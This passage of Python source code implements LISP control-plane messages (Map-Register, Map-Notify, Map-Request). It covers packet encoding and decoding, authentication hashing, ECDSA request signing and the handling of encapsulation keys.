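    # shared secret is derived later via compute_shared_key() and installed
    # with add_key_by_rloc() -- see lisp_map_request.decode() below.
    #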
#
# Store a single byte into a byte string, python2 versus python3.
#
def lisp_store_byte_py2(byte):
    return(chr(byte))

def lisp_store_byte_py3(byte):
    return(bytes([byte]))

lisp_store_byte = lisp_store_byte_py2
if (lisp_is_python3()): lisp_store_byte = lisp_store_byte_py3
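#
# Example: lisp_store_byte(0x41) returns "A" under python2 and b"A" under
# python3, so callers can assemble packed byte strings one octet at a time
# without version checks at each call site.
#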
class lisp_thread(object):
    def __init__(self, name):
        self.thread_name = name
        self.thread_number = -1
        self.number_of_pcap_threads = 0
        self.number_of_worker_threads = 0
        self.input_queue = queue.Queue()
        self.input_stats = lisp_stats()
        self.lisp_packet = lisp_packet(None)
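    #
    # Usage sketch (an assumption inferred from the fields above, not
    # original text): one lisp_thread is handed to each pcap/worker thread;
    # packets are queued on input_queue and counted in input_stats, e.g.:
    #
    #   t = lisp_thread("worker-1")
    #   t.input_queue.put(packet_bytes)
    #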
class lisp_control_header(object):
    def __init__(self):
        self.type = 0
        self.record_count = 0
        self.nonce = 0
        self.rloc_probe = False
        self.smr_bit = False
        self.smr_invoked_bit = False
        self.ddt_bit = False
        self.to_etr = False
        self.to_ms = False
        self.info_reply = False

    def decode(self, packet):
        packet_format = "BBBBQ"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(False)

        typeval, bits, reserved, self.record_count, self.nonce = \
            struct.unpack(packet_format, packet[:format_size])

        #
        # The message type lives in the high-order nibble; the flag bits
        # below it depend on the type.
        #
        self.type = typeval >> 4
        if (self.type == LISP_MAP_REQUEST):
            self.smr_bit = True if (typeval & 0x01) else False
            self.rloc_probe = True if (typeval & 0x02) else False
            self.smr_invoked_bit = True if (bits & 0x40) else False

        if (self.type == LISP_ECM):
            self.ddt_bit = True if (typeval & 0x04) else False
            self.to_etr = True if (typeval & 0x02) else False
            self.to_ms = True if (typeval & 0x01) else False

        if (self.type == LISP_NAT_INFO):
            self.info_reply = True if (typeval & 0x08) else False
        return(True)
    def is_info_request(self):
        return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))

    def is_info_reply(self):
        return(True if self.info_reply else False)

    def is_rloc_probe(self):
        return(True if self.rloc_probe else False)

    def is_smr(self):
        return(True if self.smr_bit else False)

    def is_smr_invoked(self):
        return(True if self.smr_invoked_bit else False)

    def is_ddt(self):
        return(True if self.ddt_bit else False)

    def is_to_etr(self):
        return(True if self.to_etr else False)

    def is_to_ms(self):
        return(True if self.to_ms else False)
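    #
    # Example (illustrative): peeking at a control message before dispatch:
    #
    #   header = lisp_control_header()
    #   if (header.decode(packet) and header.is_rloc_probe()):
    #       ... handle an RLOC-probe Map-Request ...
    #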
class lisp_map_register(object):
    def __init__(self):
        self.proxy_reply_requested = False
        self.lisp_sec_present = False
        self.xtr_id_present = False
        self.map_notify_requested = False
        self.mobile_node = False
        self.merge_register_requested = False
        self.use_ttl_for_timeout = False
        self.map_register_refresh = False
        self.record_count = 0
        self.nonce = 0
        self.alg_id = 0
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = 0
        self.xtr_id = 0
        self.site_id = 0
        self.sport = 0
        self.encrypt_bit = 0
        self.encryption_key_id = None
    def print_map_register(self):
        xtr_id = lisp_hex_string(self.xtr_id)

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
            "{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
            "0x{}, site-id: {}")

        lprint(line.format(bold("Map-Register", False),
            "P" if self.proxy_reply_requested else "p",
            "S" if self.lisp_sec_present else "s",
            "I" if self.xtr_id_present else "i",
            "T" if self.use_ttl_for_timeout else "t",
            "R" if self.merge_register_requested else "r",
            "M" if self.mobile_node else "m",
            "N" if self.map_notify_requested else "n",
            "F" if self.map_register_refresh else "f",
            "E" if self.encrypt_bit else "e",
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID)
            else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else
            ""), self.auth_len, xtr_id, self.site_id))
    def encode(self):
        first_long = (LISP_MAP_REGISTER << 28) | self.record_count
        if (self.proxy_reply_requested): first_long |= 0x08000000
        if (self.lisp_sec_present): first_long |= 0x04000000
        if (self.xtr_id_present): first_long |= 0x02000000
        if (self.map_register_refresh): first_long |= 0x1000
        if (self.use_ttl_for_timeout): first_long |= 0x800
        if (self.merge_register_requested): first_long |= 0x400
        if (self.mobile_node): first_long |= 0x200
        if (self.map_notify_requested): first_long |= 0x100
        if (self.encryption_key_id != None):
            first_long |= 0x2000
            first_long |= self.encryption_key_id << 14

        #
        # Fill in auth-len based on alg-id.
        #
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.auth_len = 0
        else:
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
            if (self.alg_id == LISP_SHA_256_128_ALG_ID):
                self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        packet = self.zero_auth(packet)
        return(packet)
    def zero_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_data = b""
        auth_len = 0
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
            auth_len = struct.calcsize("QQI")
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
            auth_len = struct.calcsize("QQQQ")
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return(packet)

    def encode_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        auth_data = self.auth_data
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return(packet)
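    #
    # Authentication flow (sketch): callers encode() the header with a zeroed
    # auth field, hash the full message with the site password, then splice
    # the digest in with encode_auth(); a verifier repeats the same
    # zero-then-hash sequence and compares digests.
    #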
    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(packet_format, packet[:format_size])

        self.nonce = byte_swap_64(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        self.proxy_reply_requested = True if (first_long & 0x08000000) \
            else False
        self.lisp_sec_present = True if (first_long & 0x04000000) else False
        self.xtr_id_present = True if (first_long & 0x02000000) else False
        self.use_ttl_for_timeout = True if (first_long & 0x800) else False
        self.map_register_refresh = True if (first_long & 0x1000) else False
        self.merge_register_requested = True if (first_long & 0x400) else False
        self.mobile_node = True if (first_long & 0x200) else False
        self.map_notify_requested = True if (first_long & 0x100) else False
        self.record_count = first_long & 0xff

        #
        # Decode the e-bit and encryption key-id.
        #
        self.encrypt_bit = True if first_long & 0x2000 else False
        if (self.encrypt_bit):
            self.encryption_key_id = (first_long >> 14) & 0x7

        #
        # The xTR-ID and site-ID trail the packet, if present.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(orig_packet) == False):
                return([None, None])

        packet = packet[format_size::]

        #
        # Parse and validate the authentication data.
        #
        if (self.auth_len != 0):
            if (len(packet) < self.auth_len): return([None, None])

            if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
                LISP_SHA_256_128_ALG_ID)):
                lprint("Invalid authentication alg-id: {}".format(self.alg_id))
                return([None, None])

            auth_len = self.auth_len
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                format_size = struct.calcsize("QQI")
                if (auth_len < format_size):
                    lprint("Invalid sha1-96 authentication length")
                    return([None, None])
                auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
                auth4 = b""
            elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
                format_size = struct.calcsize("QQQQ")
                if (auth_len < format_size):
                    lprint("Invalid sha2-256 authentication length")
                    return([None, None])
                auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                    packet[:auth_len])
            else:
                lprint("Unsupported authentication alg-id value {}".format(
                    self.alg_id))
                return([None, None])

            self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
                auth3, auth4)
            orig_packet = self.zero_auth(orig_packet)
            packet = packet[self.auth_len::]

        return([orig_packet, packet])
    def encode_xtr_id(self, packet):
        xtr_id_upper = self.xtr_id >> 64
        xtr_id_lower = self.xtr_id & 0xffffffffffffffff
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        site_id = byte_swap_64(self.site_id)
        packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
        return(packet)

    def decode_xtr_id(self, packet):
        format_size = struct.calcsize("QQQ")
        if (len(packet) < format_size): return([None, None])
        packet = packet[len(packet) - format_size::]
        xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
            packet[:format_size])
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
        self.site_id = byte_swap_64(site_id)
        return(True)
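    #
    # Note: the 128-bit xTR-ID and 64-bit site-ID always occupy the last 24
    # bytes of the Map-Register, which is why decode_xtr_id() slices from the
    # end of the packet instead of tracking a running offset.
    #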
class lisp_map_notify(object):
    def __init__(self, lisp_sockets):
        self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.etr_port = 0
        self.retransmit_timer = None
        self.lisp_sockets = lisp_sockets
        self.retry_count = 0
        self.record_count = 0
        self.alg_id = LISP_NONE_ALG_ID
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = ""
        self.nonce = 0
        self.nonce_key = ""
        self.packet = None
        self.site = ""
        self.map_notify_ack = False
        self.eid_records = ""
        self.eid_list = []
    def print_notify(self):
        auth_data = binascii.hexlify(self.auth_data)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
            auth_data = self.auth_data
        elif (self.alg_id == LISP_SHA_256_128_ALG_ID and
            len(auth_data) != 64):
            auth_data = self.auth_data

        line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
            "{}{}{}, auth-len: {}, auth-data: {}")
        lprint(line.format(bold("Map-Notify-Ack", False) if
            self.map_notify_ack else bold("Map-Notify", False),
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID)
            else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else
            ""), self.auth_len, auth_data))
    def zero_auth(self, packet):
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
        packet += auth_data
        return(packet)
    def encode(self, eid_records, password):
        if (self.map_notify_ack):
            first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
        else:
            first_long = (LISP_MAP_NOTIFY << 28) | self.record_count

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        if (self.alg_id == LISP_NONE_ALG_ID):
            self.packet = packet + eid_records
            return(self.packet)

        #
        # Hash over a zeroed auth field, then splice the digest in.
        #
        packet = self.zero_auth(packet)
        packet += eid_records

        hashval = lisp_hash_me(packet, self.alg_id, password, False)

        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        self.auth_data = hashval
        packet = packet[0:offset] + hashval + packet[offset + auth_len::]
        self.packet = packet
        return(packet)
    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
        self.record_count = first_long & 0xff
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(packet_format, packet[:format_size])

        self.nonce_key = lisp_hex_string(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        packet = packet[format_size::]
        self.eid_records = packet[self.auth_len::]

        if (self.auth_len == 0): return(self.eid_records)

        #
        # Parse the authentication data and return a copy of the packet
        # with the auth field zeroed, ready for hash verification.
        #
        if (len(packet) < self.auth_len): return(None)

        auth_len = self.auth_len
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
            auth4 = ""
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                packet[:auth_len])

        self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
            auth3, auth4)

        format_size = struct.calcsize("I") + struct.calcsize("QHH")
        packet = self.zero_auth(orig_packet[:format_size])
        format_size += auth_len
        packet += orig_packet[format_size::]
        return(packet)
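    #
    # Verification sketch: the caller re-hashes the packet returned above
    # (auth field zeroed) with the shared password and compares the digest
    # against self.auth_data; self.eid_records already points past the auth
    # data for record parsing.
    #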
class lisp_map_request(object):
    def __init__(self):
        self.auth_bit = False
        self.map_data_present = False
        self.rloc_probe = False
        self.smr_bit = False
        self.pitr_bit = False
        self.smr_invoked_bit = False
        self.mobile_node = False
        self.xtr_id_present = False
        self.local_xtr = False
        self.dont_reply_bit = False
        self.itr_rloc_count = 0
        self.record_count = 0
        self.nonce = 0
        self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.itr_rlocs = []
        self.keys = None
        self.privkey_filename = None
        self.map_request_signature = None
        self.subscribe_bit = False
        self.xtr_id = None
        self.json_telemetry = None

    def print_prefix(self):
        if (self.target_group.is_null()):
            return(green(self.target_eid.print_prefix(), False))
        return(green(self.target_eid.print_sg(self.target_group), False))
    def print_map_request(self):
        xtr_id_str = ""
        if (self.xtr_id != None and self.subscribe_bit):
            xtr_id_str = "subscribe, xtr-id: 0x{}, ".format(
                lisp_hex_string(self.xtr_id))

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
            "count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
            "afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")

        lprint(line.format(bold("Map-Request", False),
            "A" if self.auth_bit else "a",
            "D" if self.map_data_present else "d",
            "R" if self.rloc_probe else "r",
            "S" if self.smr_bit else "s",
            "P" if self.pitr_bit else "p",
            "I" if self.smr_invoked_bit else "i",
            "M" if self.mobile_node else "m",
            "X" if self.xtr_id_present else "x",
            "L" if self.local_xtr else "l",
            "D" if self.dont_reply_bit else "d", self.itr_rloc_count,
            self.record_count, lisp_hex_string(self.nonce),
            self.source_eid.afi, green(self.source_eid.print_address(),
            False), " (with sig)" if self.map_request_signature != None
            else "", self.target_eid.afi, green(self.print_prefix(), False),
            xtr_id_str))

        keys = self.keys
        for itr_rloc in self.itr_rlocs:
            if (itr_rloc.afi == LISP_AFI_LCAF and
                self.json_telemetry != None):
                continue
            addr_str = red(itr_rloc.print_address_no_iid(), False)
            lprint(" itr-rloc: afi {} {}{}".format(itr_rloc.afi, addr_str,
                "" if (keys == None) else ", " + keys[1].print_keys()))
            keys = None

        if (self.json_telemetry != None):
            lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
                self.json_telemetry))
    def sign_map_request(self, privkey):
        sig_eid = self.signature_eid.print_address()
        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        self.map_request_signature = privkey.sign(sig_data.encode())
        sig = binascii.b2a_base64(self.map_request_signature)
        sig = {"source-eid": source_eid, "signature-eid": sig_eid,
            "signature": sig.decode()}
        return(json.dumps(sig))
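    #
    # Signature coverage (sketch): the signature is computed over the
    # concatenation nonce + source-EID + target-EID, so a replayed request
    # with a different nonce or target fails verify_map_request_sig() below.
    #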
    def verify_map_request_sig(self, pubkey):
        sig_eid = green(self.signature_eid.print_address(), False)
        if (pubkey == None):
            lprint("Public-key not found for signature-EID {}".format(
                sig_eid))
            return(False)

        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        pubkey = binascii.a2b_base64(pubkey)

        good = True
        try:
            key = ecdsa.VerifyingKey.from_pem(pubkey)
        except:
            lprint("Invalid public-key in mapping system for sig-eid {}". \
                format(self.signature_eid.print_address_no_iid()))
            good = False

        if (good):
            try:
                sig_data = sig_data.encode()
                good = key.verify(self.map_request_signature, sig_data)
            except:
                good = False

        passfail = bold("passed" if good else "failed", False)
        lprint("Signature verification {} for EID {}".format(passfail,
            sig_eid))
        return(good)
    def encode_json(self, json_string):
        lcaf_type = LISP_LCAF_JSON_TYPE
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_len = socket.htons(len(json_string) + 4)
        json_len = socket.htons(len(json_string))
        packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
            lcaf_len, json_len)
        packet += json_string.encode()
        packet += struct.pack("H", 0)
        return(packet)
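    #
    # JSON LCAF wire layout produced above (descriptive field names):
    #
    #   AFI=LCAF | rsvd | flags | type=LISP_LCAF_JSON_TYPE | rsvd |
    #   lcaf-length | json-length | json-bytes ... | AFI=0 (no address)
    #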
    def encode(self, probe_dest, probe_port):
        first_long = (LISP_MAP_REQUEST << 28) | self.record_count

        telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
        if (telemetry != None): self.itr_rloc_count += 1
        first_long = first_long | (self.itr_rloc_count << 8)

        if (self.auth_bit): first_long |= 0x08000000
        if (self.map_data_present): first_long |= 0x04000000
        if (self.rloc_probe): first_long |= 0x02000000
        if (self.smr_bit): first_long |= 0x01000000
        if (self.pitr_bit): first_long |= 0x00800000
        if (self.smr_invoked_bit): first_long |= 0x00400000
        if (self.mobile_node): first_long |= 0x00200000
        if (self.xtr_id_present): first_long |= 0x00100000
        if (self.local_xtr): first_long |= 0x00004000
        if (self.dont_reply_bit): first_long |= 0x00002000

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)

        #
        # Sign the Map-Request if a private-key file or a precomputed
        # signature is available; otherwise encode the source-EID normally.
        #
        json_encoded = False
        filename = self.privkey_filename
        if (filename != None and os.path.exists(filename)):
            f = open(filename, "r"); key = f.read(); f.close()
            try:
                key = ecdsa.SigningKey.from_pem(key)
            except:
                return(None)
            json_string = self.sign_map_request(key)
            json_encoded = True
        elif (self.map_request_signature != None):
            sig = binascii.b2a_base64(self.map_request_signature)
            json_string = {"source-eid": self.source_eid.print_address(),
                "signature-eid": self.signature_eid.print_address(),
                "signature": sig}
            json_string = json.dumps(json_string)
            json_encoded = True

        if (json_encoded):
            packet += self.encode_json(json_string)
        else:
            if (self.source_eid.instance_id != 0):
                packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
                packet += self.source_eid.lcaf_encode_iid()
            else:
                packet += struct.pack("H", socket.htons(self.source_eid.afi))
                packet += self.source_eid.pack_address()

        #
        # For an RLOC-probe, reuse any encap keys already negotiated with
        # the probed RLOC.
        #
        if (probe_dest):
            if (probe_port == 0): probe_port = LISP_DATA_PORT
            addr_str = probe_dest.print_address_no_iid() + ":" + \
                str(probe_port)

            if (addr_str in lisp_crypto_keys_by_rloc_encap):
                self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]

        #
        # Encode the ITR-RLOC list; the first entry carries the security
        # LCAF when data-plane security is enabled.
        #
        for itr_rloc in self.itr_rlocs:
            if (lisp_data_plane_security and
                self.itr_rlocs.index(itr_rloc) == 0):
                if (self.keys == None or self.keys[1] == None):
                    keys = lisp_keys(1)
                    self.keys = [None, keys, None, None]
                keys = self.keys[1]
                keys.add_key_by_nonce(self.nonce)
                packet += keys.encode_lcaf(itr_rloc)
            else:
                packet += struct.pack("H", socket.htons(itr_rloc.afi))
                packet += itr_rloc.pack_address()

        #
        # Append a JSON telemetry ITR-RLOC when RLOC-probing with telemetry
        # configured.
        #
        if (telemetry != None):
            ts = str(time.time())
            telemetry = lisp_encode_telemetry(telemetry, io=ts)
            self.json_telemetry = telemetry
            packet += self.encode_json(telemetry)

        mask_len = 0 if self.target_eid.is_binary() == False else \
            self.target_eid.mask_len

        subscribe = 0
        if (self.subscribe_bit):
            subscribe = 0x80
            self.xtr_id_present = True
            if (self.xtr_id == None):
                self.xtr_id = random.randint(0, (2**128) - 1)

        packet_format = "BB"
        packet += struct.pack(packet_format, subscribe, mask_len)

        if (self.target_group.is_null() == False):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_sg(self.target_group)
        elif (self.target_eid.instance_id != 0 or
            self.target_eid.is_geo_prefix()):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_iid()
        else:
            packet += struct.pack("H", socket.htons(self.target_eid.afi))
            packet += self.target_eid.pack_address()

        if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
        return(packet)
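    #
    # Note (sketch): itr_rloc_count holds one less than the number of
    # ITR-RLOC entries actually encoded (the LISP IRC convention), hence the
    # "(+1)" in print_map_request() and the "+ 1" loop bound in decode().
    #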
    def lcaf_decode_json(self, packet):
        packet_format = "BBBBHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
            struct.unpack(packet_format, packet[:format_size])

        if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)

        #
        # Validate lengths.
        #
        lcaf_len = socket.ntohs(lcaf_len)
        json_len = socket.ntohs(json_len)
        packet = packet[format_size::]
        if (len(packet) < lcaf_len): return(None)
        if (lcaf_len != json_len + 4): return(None)

        #
        # Extract the JSON payload.
        #
        json_string = packet[0:json_len]
        packet = packet[json_len::]

        #
        # A telemetry JSON body is stored as-is and not parsed here.
        #
        if (lisp_is_json_telemetry(json_string) != None):
            self.json_telemetry = json_string

        #
        # Consume the trailing AFI; it must be 0 (no address follows).
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0): return(packet)

        if (self.json_telemetry != None): return(packet)

        #
        # Parse a signature JSON body: source-eid, signature-eid, signature.
        #
        try:
            json_string = json.loads(json_string)
        except:
            return(None)

        if ("source-eid" not in json_string): return(packet)
        eid = json_string["source-eid"]
        afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
            eid.count(":") == 7 else None
        if (afi == None):
            lprint("Bad JSON 'source-eid' value: {}".format(eid))
            return(None)

        self.source_eid.afi = afi
        self.source_eid.store_address(eid)

        if ("signature-eid" not in json_string): return(packet)
        eid = json_string["signature-eid"]
        if (eid.count(":") != 7):
            lprint("Bad JSON 'signature-eid' value: {}".format(eid))
            return(None)

        self.signature_eid.afi = LISP_AFI_IPV6
        self.signature_eid.store_address(eid)

        if ("signature" not in json_string): return(packet)
        sig = binascii.a2b_base64(json_string["signature"])
        self.map_request_signature = sig
        return(packet)
    def decode(self, packet, source, port):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        first_long = socket.ntohl(first_long)
        self.auth_bit = True if (first_long & 0x08000000) else False
        self.map_data_present = True if (first_long & 0x04000000) else False
        self.rloc_probe = True if (first_long & 0x02000000) else False
        self.smr_bit = True if (first_long & 0x01000000) else False
        self.pitr_bit = True if (first_long & 0x00800000) else False
        self.smr_invoked_bit = True if (first_long & 0x00400000) else False
        self.mobile_node = True if (first_long & 0x00200000) else False
        self.xtr_id_present = True if (first_long & 0x00100000) else False
        self.local_xtr = True if (first_long & 0x00004000) else False
        self.dont_reply_bit = True if (first_long & 0x00002000) else False
        self.itr_rloc_count = ((first_long >> 8) & 0x1f)
        self.record_count = first_long & 0xff
        self.nonce = nonce[0]

        #
        # The xTR-ID, if present, trails the packet.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(packet) == False): return(None)

        format_size = struct.calcsize("H")
        if (len(packet) < format_size): return(None)

        afi = struct.unpack("H", packet[:format_size])
        self.source_eid.afi = socket.ntohs(afi[0])
        packet = packet[format_size::]

        if (self.source_eid.afi == LISP_AFI_LCAF):
            saved_packet = packet
            packet = self.source_eid.lcaf_decode_iid(packet)
            if (packet == None):
                packet = self.lcaf_decode_json(saved_packet)
                if (packet == None): return(None)
        elif (self.source_eid.afi != LISP_AFI_NONE):
            packet = self.source_eid.unpack_address(packet)
            if (packet == None): return(None)

        self.source_eid.mask_len = self.source_eid.host_mask_len()

        no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
        self.itr_rlocs = []
        itr_rloc_count = self.itr_rloc_count + 1

        while (itr_rloc_count != 0):
            format_size = struct.calcsize("H")
            if (len(packet) < format_size): return(None)

            afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
            itr_rloc = lisp_address(LISP_AFI_NONE, "", 32, 0)
            itr_rloc.afi = afi

            #
            # An LCAF ITR-RLOC may carry JSON telemetry; if not, restore the
            # packet pointer so the security LCAF path below can reparse it.
            #
            if (itr_rloc.afi == LISP_AFI_LCAF):
                orig_packet = packet
                json_packet = packet[format_size::]
                packet = self.lcaf_decode_json(json_packet)
                if (packet == None): return(None)
                if (packet == json_packet): packet = orig_packet

            #
            # A plain AFI-encoded ITR-RLOC.
            #
            if (itr_rloc.afi != LISP_AFI_LCAF):
                if (len(packet) < itr_rloc.addr_length()): return(None)
                packet = itr_rloc.unpack_address(packet[format_size::])
                if (packet == None): return(None)

                if (no_crypto):
                    self.itr_rlocs.append(itr_rloc)
                    itr_rloc_count -= 1
                    continue

                addr_str = lisp_build_crypto_decap_lookup_key(itr_rloc, port)

                #
                # No security LCAF supplied: remove any stored decap keys
                # for this RLOC and tell the data-plane.
                #
                if (lisp_nat_traversal and itr_rloc.is_private_address()
                    and source): itr_rloc = source

                decap_keys = lisp_crypto_keys_by_rloc_decap
                if (addr_str in decap_keys): decap_keys.pop(addr_str)

                lisp_write_ipc_decap_key(addr_str, None)
            elif (self.json_telemetry == None):
                #
                # A security LCAF ITR-RLOC: decode the offered cipher-suite
                # first, then reparse with a matching key type.
                #
                orig_packet = packet
                decode_key = lisp_keys(1)
                packet = decode_key.decode_lcaf(orig_packet, 0)
                if (packet == None): return(None)

                cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
                    LISP_CS_25519_CHACHA]
                if (decode_key.cipher_suite in cs_list):
                    if (decode_key.cipher_suite == LISP_CS_25519_CBC or
                        decode_key.cipher_suite == LISP_CS_25519_GCM):
                        key = lisp_keys(1, do_poly=False, do_chacha=False)
                    if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
                        key = lisp_keys(1, do_poly=True, do_chacha=True)
                else:
                    key = lisp_keys(1, do_poly=False, do_curve=False,
                        do_chacha=False)
                packet = key.decode_lcaf(orig_packet, 0)
                if (packet == None): return(None)

                if (len(packet) < format_size): return(None)
                afi = struct.unpack("H", packet[:format_size])[0]
                itr_rloc.afi = socket.ntohs(afi)
                if (len(packet) < itr_rloc.addr_length()): return(None)

                packet = itr_rloc.unpack_address(packet[format_size::])
                if (packet == None): return(None)

                if (no_crypto):
                    self.itr_rlocs.append(itr_rloc)
                    itr_rloc_count -= 1
                    continue

                addr_str = lisp_build_crypto_decap_lookup_key(itr_rloc, port)

                stored_key = None
                if (lisp_nat_traversal and itr_rloc.is_private_address()
                    and source): itr_rloc = source

                if (addr_str in lisp_crypto_keys_by_rloc_decap):
                    keys = lisp_crypto_keys_by_rloc_decap[addr_str]
                    stored_key = keys[1] if keys and keys[1] else None

                new_keying = True
                if (stored_key):
                    if (stored_key.compare_keys(key)):
                        self.keys = [None, stored_key, None, None]
                        lprint("Maintain stored decap-keys for RLOC {}". \
                            format(red(addr_str, False)))
                    else:
                        new_keying = False
                        rekey = bold("Remote decap-rekeying", False)
                        lprint("{} for RLOC {}".format(rekey, red(addr_str,
                            False)))
                        key.copy_keypair(stored_key)
                        key.uptime = stored_key.uptime
                        stored_key = None

                if (stored_key == None):
                    self.keys = [None, key, None, None]
                    if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
                        key.local_public_key = None
                        lprint("{} for {}".format(bold("Ignoring decap-keys",
                            False), red(addr_str, False)))
                    elif (key.remote_public_key != None):
